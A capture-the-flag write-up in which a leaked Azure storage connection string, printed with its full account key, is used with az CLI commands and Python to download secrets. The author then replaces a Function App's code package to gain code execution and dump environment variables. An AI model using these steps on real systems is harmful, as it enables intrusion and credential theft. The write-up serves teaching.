Power Dictionary

CTF Challenge - June 2023

Power Dictionary was a challenge from CyberSci Nationals 2023, Team Canada's qualifiers for the International Cybersecurity Challenge.

We were provided with a single HTTP endpoint ending in /app/function, which returned the following text:

Please specify a "key" url parameter

Providing a random key, let's say "foo", will result in the following:

foo has value Not a valid key - must be one of TEMPERATURE_VALUE, POWER_OUTPUT, STORAGE_OUTPUT
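So the function echoes back whatever is in the key query parameter. The whole exchange can be reproduced in a couple of lines of Python (the base URL here is an assumption, inferred from the hostName we recover later in this writeup):

import requests

# Assumed endpoint, based on the hostName found later; not confirmed verbatim
base = "https://ntl23-maplebacon-functionapp.azurewebsites.net/app/function"
print(requests.get(base, params={"key": "foo"}).text)
# -> foo has value Not a valid key - must be one of TEMPERATURE_VALUE, ...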

Naturally, we try the keys given. The first two are not particularly interesting, and don't seem to change:

TEMPERATURE_VALUE has value GOOD

POWER_OUTPUT has value STABLE

STORAGE_OUTPUT gives something more interesting, although perhaps a bit unrealistic:

STORAGE_OUTPUT has value DefaultEndpointsProtocol=https;AccountName=c383e7a650712308csntl23;AccountKey=huOmzdkuw8sqC7gsHNUvw4wKDSKozhhFt2qHcxNIOoQpEIYdlOu1tUSapBpKbVft+CYGM/8A+FAY+AStLTlzig==;EndpointSuffix=core.windows.net

Searching the internet for core.windows.net gives us numerous references to Microsoft Azure, namely a List of Azure Domains. From this page, and the context mentioning storage, we infer that these are likely credentials for one of Azure's storage APIs. To interact with the Azure API, I decided to use the Azure CLI tool in the conveniently provided Docker container, with steps detailed in this article. Unfortunately, account keys can only access storage in Azure and can't be used for any other API functions, so we can't simply enumerate active APIs, services, or accounts, for example.

$ docker run -it mcr.microsoft.com/azure-cli
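As an aside, the connection string format is simple: semicolon-separated key=value pairs. The account name and key that the CLI wants can be pulled out with plain Python (note the maxsplit of 1, since the base64 AccountKey itself contains = characters):

conn_str = (
    "DefaultEndpointsProtocol=https;AccountName=c383e7a650712308csntl23;"
    "AccountKey=huOmzdkuw8sqC7gsHNUvw4wKDSKozhhFt2qHcxNIOoQpEIYdlOu1tUSapBpKbVft+CYGM/8A+FAY+AStLTlzig==;"
    "EndpointSuffix=core.windows.net"
)

# Split on ';' into fields, then on the *first* '=' only: the base64
# AccountKey ends in '==' and would otherwise be mangled.
fields = dict(part.split("=", 1) for part in conn_str.split(";") if part)
print(fields["AccountName"])  # used as $NAME in the commands below
print(fields["AccountKey"])   # used as $KEY in the commands below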

Since it was first on the list of domains, I went down the rabbit hole of the Blob API for a while. It didn't have anything useful for this challenge, but the presence of a host.json file did confirm that the application was running on an Azure Function, Microsoft's equivalent of serverless AWS Lambda functions. Some more information in this article.

docker:/# az storage blob download -c azure-webjobs-secrets --name ntl23-maplebacon-functionapp/host.json --account-name $NAME --account-key $KEY --auth-mode key
Finished[#############################################################] 100.0000%
{
  "masterKey": {
    "name": "master",
    "value": "$ENCRYPTED DATA",
    "encrypted": true
  },
  "functionKeys": [
    {
      "name": "default",
      "value": "$ENCRYPTED DATA",
      "encrypted": true
    }
  ],
  "systemKeys": [],
  "hostName": "ntl23-maplebacon-functionapp.azurewebsites.net",
  "instanceId": "00000000000000000000000051B88758",
  "source": "runtime",
  "decryptionKeyId": "AzureWebEncryptionKey=UwJ5EueXM66N3xDoiQR8EdlqyHPlSa78eoSfChHyAVk=;"
  ...
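The same fetch also works outside the CLI; with the azure-storage-blob Python package it's a few lines (a sketch, not the workflow I actually used):

from azure.storage.blob import BlobServiceClient

# The leaked STORAGE_OUTPUT value goes here in full
conn_str = "DefaultEndpointsProtocol=https;AccountName=...;AccountKey=...;EndpointSuffix=core.windows.net"

service = BlobServiceClient.from_connection_string(conn_str)
container = service.get_container_client("azure-webjobs-secrets")
blob = container.get_blob_client("ntl23-maplebacon-functionapp/host.json")
print(blob.download_blob().readall().decode())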

After coming out of that rabbit hole, I realized the keys could also access the Files API. With that, I was able to list and download the files in the share associated with the account.

docker:/# az storage file download-batch -d . --source ntl23-maplebacon-functionapp-6d97 --account-name $NAME --account-key $KEY

Which gives the following filesystem:

[image: directory listing of the downloaded file share]
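If you'd rather script this step than use the CLI, the azure-storage-file-share package can enumerate the shares as well (a sketch; list_directories_and_files only returns one level, so a real crawler would recurse into directories):

from azure.storage.fileshare import ShareServiceClient

# The leaked STORAGE_OUTPUT value goes here in full
conn_str = "DefaultEndpointsProtocol=https;AccountName=...;AccountKey=...;EndpointSuffix=core.windows.net"

service = ShareServiceClient.from_connection_string(conn_str)
for share in service.list_shares():
    print(share.name)
    share_client = service.get_share_client(share.name)
    # Top level only; recurse for the full tree
    for item in share_client.list_directories_and_files():
        print("   ", item.name)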

The filesystem seems to contain files related to the deployment of the serverless function. There are a few uninteresting log files and lock/status files, but also a suspicious settings.xml, a restartTrigger.txt, and a zip file. The settings.xml contains various environment variables related to the deployment, including the TEMPERATURE_VALUE, POWER_OUTPUT, and STORAGE_OUTPUT variables hardcoded, but nothing resembling a flag variable. Notably, it also sets WEBSITE_RUN_FROM_PACKAGE=1, which is what makes the trick we're about to pull possible.

The file command tells us that 20230603165602.zip is actually a squashfs filesystem, which we can unpack and repack with unsquashfs and mksquashfs; if you try to unzip this file, it will fail (never trust file extensions). Unpacking gives us the following files, which turn out to be the source of the serverless function:

.
└── function
    ├── __init__.py
    └── function.json
in __init__.py:

import azure.functions
import os


def main(req: azure.functions.HttpRequest) -> str:
    key = req.params.get("key")
    if key is None:
        return 'Please specify a "key" url parameter'
    value = "Not a valid key - must be one of TEMPERATURE_VALUE, POWER_OUTPUT, STORAGE_OUTPUT"
    # Make sure that no one gets sensitive values like our custom NUCLEAR_CODE connection string
    if key in ["TEMPERATURE_VALUE", "POWER_OUTPUT", "STORAGE_OUTPUT"]:
        value = os.getenv(key)
    return f"{key} has value {value}"
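As an aside, the zip-that-isn't-a-zip from earlier is easy to spot even without the file command: squashfs images begin with the magic bytes hsqs, whereas real zips begin with PK (a quick check):

# squashfs magic is 0x73717368 little-endian, i.e. b"hsqs" on disk;
# a genuine zip would start with b"PK\x03\x04" instead.
with open("20230603165602.zip", "rb") as f:
    magic = f.read(4)

print(magic)             # b'hsqs'
print(magic == b"hsqs")  # True: squashfs, not a zip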

Since WEBSITE_RUN_FROM_PACKAGE=1 is set, the function runs directly from this package in the storage share, which means we can sideload new code just by replacing the packed squashfs with our own, then triggering a restart by overwriting restartTrigger.txt. The commands needed are:

$ unsquashfs 20230603165602.zip
$ vim squashfs-root/function/__init__.py
$ mksquashfs squashfs-root 20230603165602.zip
$ docker run -v ./:/mnt -it mcr.microsoft.com/azure-cli
docker:/# az storage file upload --share-name ntl23-maplebacon-functionapp-6d97 --path data/SitePackages/20230603165602.zip --source /mnt/20230603165602.zip --account-name $NAME --account-key $KEY
docker:/# az storage file upload --share-name ntl23-maplebacon-functionapp-afc3 --path site/config/restartTrigger.txt --source /wheee/az-3/site/config/restartTrigger.txt --account-name $NAME --account-key $KEY

And just like that, we theoretically have arbitrary code execution. Unfortunately, here's where things get tricky: overwriting restartTrigger.txt seems to only work once, and subsequent uploads of code are not loaded. The first thing I did was remove the if check on valid keys and try to guess the correct key, without success. I couldn't find it documented anywhere until after the fact, but supposedly a custom database connection string specified in the Azure web portal gets a CUSTOMCONNSTR_ prefix, so the key I was looking for should have been CUSTOMCONNSTR_NUCLEAR_CODE.

Regardless, I decided I would just print all of os.environ, but my second attempt at uploading new code wouldn't load, and would occasionally cause the function to return 500. Since this is a serverless function (an Azure Function on the Consumption plan), the service keeps functions loaded in memory on workers while the app is "warm", i.e. recently and frequently accessed. New code isn't reloaded until there is a cold start, and that happens non-deterministically depending on certain heuristics and usage. This is great for speed, but inordinately frustrating when trying to debug whether a payload works. In fact, the more impatiently you refresh the endpoint, the more you reset the cold start timer and increase the time you might have to wait. The only way to ensure a reload is to leave the app alone for a length of time, possibly up to 30 minutes, so that the workers are cleaned up and the next request triggers a cold start.
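For reference, the environ-dumping payload was just a small tweak to the original handler; the exact code wasn't preserved, but judging from the output below it looked roughly like this:

import azure.functions
import os


def main(req: azure.functions.HttpRequest) -> str:
    key = req.params.get("key")
    value = os.getenv(key) if key is not None else None
    # Tack the entire environment onto the normal response
    return f"{key} has value {value}, {os.environ}"

After waiting out a cold start, we get this output on request: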

TEMPERATURE_VALUE has value GOOD, environ(..., 'WEBSITE_DEPLOYMENT_ID': 'ntl23-maplebacon-functionapp', 'CUSTOMCONNSTR_NUCLEAR_CODE': 'f1457921c9081236e013cb92d8e5a1ee', 'TERM': 'xterm', 'WEBSITE_SITE_NAME': 'ntl23-maplebacon-functionapp', ..., 'POWER_OUTPUT': 'STABLE', 'APPSETTING_WEBSITE_SITE_NAME': 'ntl23-maplebacon-functionapp', ...})

Found a flag!